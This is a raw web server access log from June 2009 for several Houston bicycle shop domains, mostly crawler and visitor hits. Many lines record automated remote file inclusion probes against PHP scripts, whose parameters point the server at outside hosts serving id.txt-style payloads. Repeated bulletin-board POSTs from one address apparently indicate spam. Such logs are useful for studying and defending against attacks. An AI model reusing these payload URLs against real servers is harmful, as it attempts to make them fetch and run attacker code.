58.61.164.141 - - [11/Jun/2009:03:33:42 -0700] "GET / HTTP/1.1" 200 1764 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "houstonbikeshop.com"
58.61.164.139 - - [11/Jun/2009:03:36:36 -0700] "GET / HTTP/1.1" 200 1764 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:03:37:34 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:03:41:40 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
72.36.134.234 - - [11/Jun/2009:03:45:02 -0700] "GET /logs/access.log//?view=page&pagename=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.61.164.39 - - [11/Jun/2009:03:47:04 -0700] "GET / HTTP/1.1" 200 1764 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "houstonbikeshop.com"
70.38.54.140 - - [11/Jun/2009:03:47:15 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://adresik.info//components/com_agora/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.54.140 - - [11/Jun/2009:03:47:16 -0700] "GET /logs/access.log%20%20//skin/zero_vote/ask_password.php?dir=http://adresik.info//components/com_agora/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.54.140 - - [11/Jun/2009:03:47:16 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://adresik.info//components/com_agora/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.54.140 - - [11/Jun/2009:03:47:20 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://adresik.info//components/com_agora/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.54.140 - - [11/Jun/2009:03:47:20 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://adresik.info//components/com_agora/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.54.140 - - [11/Jun/2009:03:47:20 -0700] "GET /logs/access.log%20%20//skin/zero_vote/ask_password.php?dir=http://adresik.info//components/com_agora/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.61.164.140 - - [11/Jun/2009:03:47:51 -0700] "GET / HTTP/1.1" 200 1764 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:03:47:58 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
124.115.1.8 - - [11/Jun/2009:03:53:52 -0700] "GET / HTTP/1.1" 200 1764 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "houstonbikeshop.com"
66.96.240.245 - - [11/Jun/2009:04:01:08 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.96.240.245 - - [11/Jun/2009:04:01:08 -0700] "GET /skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.96.240.245 - - [11/Jun/2009:04:01:08 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.96.240.245 - - [11/Jun/2009:04:01:12 -0700] "GET /skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.96.240.245 - - [11/Jun/2009:04:01:12 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.96.240.245 - - [11/Jun/2009:04:01:12 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.206.170.126 - - [11/Jun/2009:04:06:09 -0700] "GET /skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.206.170.126 - - [11/Jun/2009:04:06:09 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.206.170.126 - - [11/Jun/2009:04:06:11 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.206.170.126 - - [11/Jun/2009:04:07:05 -0700] "GET /skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.206.170.126 - - [11/Jun/2009:04:07:05 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.206.170.126 - - [11/Jun/2009:04:07:06 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.206.170.126 - - [11/Jun/2009:04:07:33 -0700] "GET /skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.206.170.126 - - [11/Jun/2009:04:07:33 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.206.170.126 - - [11/Jun/2009:04:07:33 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.ceshima.com.mx//administrator/id2.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.247.222.54 - - [11/Jun/2009:04:08:47 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "bicyclestoreshouston.com"
61.247.222.54 - - [11/Jun/2009:04:08:49 -0700] "GET /bullitinboard/viewtopic.php?p=15752 HTTP/1.1" 200 533 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "bicyclestoreshouston.com"
72.30.79.51 - - [11/Jun/2009:04:12:27 -0700] "GET /translations/French.txt HTTP/1.0" 200 39051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
72.30.142.240 - - [11/Jun/2009:04:14:35 -0700] "GET /tmp/?N=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
72.30.79.51 - - [11/Jun/2009:04:24:22 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
195.128.18.18 - - [11/Jun/2009:04:44:48 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:44:51 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:44:52 -0700] "GET /Employeesite/ HTTP/1.0" 401 395 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:44:52 -0700] "GET /?N=D HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:44:52 -0700] "GET /?M=A HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:44:53 -0700] "GET /?S=A HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:44:53 -0700] "GET /?D=A HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:44:53 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:44:54 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:44:54 -0700] "GET /Employeesite/ HTTP/1.0" 401 395 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:44:55 -0700] "GET /?N=D HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:44:55 -0700] "GET /?M=A HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:44:55 -0700] "GET /?S=A HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:44:56 -0700] "GET /?D=A HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:44:56 -0700] "GET /tmp/ HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:44:56 -0700] "GET /?N=A HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:44:57 -0700] "GET /?M=D HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:44:57 -0700] "GET /?S=D HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:44:57 -0700] "GET /?D=D HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:44:58 -0700] "GET /logs/ HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:44:59 -0700] "GET /fit.html HTTP/1.0" 200 17443 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:44:59 -0700] "GET /contactus.html HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:45:00 -0700] "GET /aboutus.html HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:45:00 -0700] "GET /services.html HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:45:00 -0700] "GET /Product.html HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:45:01 -0700] "GET /Rides.html HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:45:01 -0700] "GET /tmp/?N=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:45:01 -0700] "GET /tmp/?M=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:45:02 -0700] "GET /tmp/?S=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:45:04 -0700] "GET /tmp/?D=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:45:04 -0700] "GET /tmp/?N=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:45:05 -0700] "GET /tmp/?M=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:45:05 -0700] "GET /tmp/?S=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
195.128.18.18 - - [11/Jun/2009:04:45:05 -0700] "GET /tmp/?D=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; DBLBot/1.0; +http://www.dontbuylists.com/)" "www.svbikes.com"
222.122.49.29 - - [11/Jun/2009:04:59:21 -0700] "GET /send_reminders.php?noSet=0&includedir=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.122.49.29 - - [11/Jun/2009:04:59:21 -0700] "GET /send_reminders.php?noSet=0&includedir=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.122.49.29 - - [11/Jun/2009:04:59:21 -0700] "GET /translations//send_reminders.php?noSet=0&includedir=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.122.49.29 - - [11/Jun/2009:04:59:21 -0700] "GET /translations//send_reminders.php?noSet=0&includedir=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.122.49.29 - - [11/Jun/2009:05:05:23 -0700] "GET /translations/Czech.txt//send_reminders.php?noSet=0&includedir=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.122.49.29 - - [11/Jun/2009:05:05:23 -0700] "GET /translations/Czech.txt//send_reminders.php?noSet=0&includedir=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.122.49.29 - - [11/Jun/2009:05:05:41 -0700] "GET /translations/Turkish.txt//send_reminders.php?noSet=0&includedir=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.122.49.29 - - [11/Jun/2009:05:05:41 -0700] "GET /translations/Turkish.txt//send_reminders.php?noSet=0&includedir=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.122.49.29 - - [11/Jun/2009:05:05:41 -0700] "GET /send_reminders.php?noSet=0&includedir=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.122.49.29 - - [11/Jun/2009:05:05:41 -0700] "GET /send_reminders.php?noSet=0&includedir=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.122.49.29 - - [11/Jun/2009:05:05:41 -0700] "GET /translations//send_reminders.php?noSet=0&includedir=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.122.49.29 - - [11/Jun/2009:05:05:41 -0700] "GET /translations//send_reminders.php?noSet=0&includedir=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.122.49.29 - - [11/Jun/2009:05:06:18 -0700] "GET /translations/Spanish.txt//send_reminders.php?noSet=0&includedir=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.122.49.29 - - [11/Jun/2009:05:06:22 -0700] "GET /translations/Spanish.txt//send_reminders.php?noSet=0&includedir=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
203.189.120.183 - - [11/Jun/2009:05:07:47 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://solelyyoursgem.com/img/products/april/bot/cora/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "houstonbikeshop.com"
72.30.142.240 - - [11/Jun/2009:05:09:07 -0700] "GET /bullitinboard/viewtopic.php?p=15375 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
119.63.194.59 - - [11/Jun/2009:05:11:39 -0700] "GET /bullitinboard/viewtopic.php?p=13461 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
65.55.106.173 - - [11/Jun/2009:05:19:44 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
87.118.90.151 - - [11/Jun/2009:05:23:47 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://a222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
114.80.93.71 - - [11/Jun/2009:05:47:09 -0700] "GET / HTTP/1.1" 200 1764 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
222.236.47.188 - - [11/Jun/2009:06:13:55 -0700] "GET /bbs/include/bbs.lib.inc.php?site_path=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "bicyclestoreshouston.com"
222.236.47.188 - - [11/Jun/2009:06:13:58 -0700] "GET /translations//bbs/include/bbs.lib.inc.php?site_path=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "bicyclestoreshouston.com"
222.236.47.188 - - [11/Jun/2009:06:15:01 -0700] "GET /bbs/include/bbs.lib.inc.php?site_path=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "houstonbikeshop.com"
222.236.47.188 - - [11/Jun/2009:06:15:02 -0700] "GET /translations//bbs/include/bbs.lib.inc.php?site_path=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "houstonbikeshop.com"
208.80.195.41 - - [11/Jun/2009:06:16:22 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TCom_MAX201b; SIMBAR Enabled; SIMBAR={A7033A3E-048B-426f-8145-C4B831A87789}; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:06:24:03 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
121.165.73.157 - - [11/Jun/2009:06:24:59 -0700] "GET /translations/Dutch.txt//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.165.73.157 - - [11/Jun/2009:06:25:01 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.165.73.157 - - [11/Jun/2009:06:25:27 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.165.73.157 - - [11/Jun/2009:06:25:30 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.165.73.157 - - [11/Jun/2009:06:25:30 -0700] "GET /translations/Dutch.txt//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.165.73.157 - - [11/Jun/2009:06:26:35 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
121.165.73.157 - - [11/Jun/2009:06:26:35 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
121.165.73.157 - - [11/Jun/2009:06:26:35 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
121.165.73.157 - - [11/Jun/2009:06:26:38 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
121.165.73.157 - - [11/Jun/2009:06:26:52 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.165.73.157 - - [11/Jun/2009:06:26:52 -0700] "GET /translations/Dutch.txt//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.165.73.157 - - [11/Jun/2009:06:26:52 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.165.73.157 - - [11/Jun/2009:06:27:59 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.165.73.157 - - [11/Jun/2009:06:27:59 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.165.73.157 - - [11/Jun/2009:06:28:02 -0700] "GET /translations/English-US.txt//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:06:33:46 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
121.165.73.157 - - [11/Jun/2009:06:35:58 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.165.73.157 - - [11/Jun/2009:06:39:36 -0700] "GET /translations/English-US.txt//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:06:40:57 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
121.165.73.157 - - [11/Jun/2009:06:59:34 -0700] "GET /translations/English-US.txt//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.165.73.157 - - [11/Jun/2009:06:59:34 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.165.73.157 - - [11/Jun/2009:06:59:34 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
71.115.113.131 - - [11/Jun/2009:07:00:53 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.svbikes.com"
71.115.111.99 - - [11/Jun/2009:07:01:00 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.svbikes.com"
71.115.111.99 - - [11/Jun/2009:07:01:03 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.svbikes.com"
91.121.150.170 - - [11/Jun/2009:07:02:13 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [11/Jun/2009:07:08:04 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [11/Jun/2009:07:12:28 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 518 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/Jun/2009:07:18:42 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
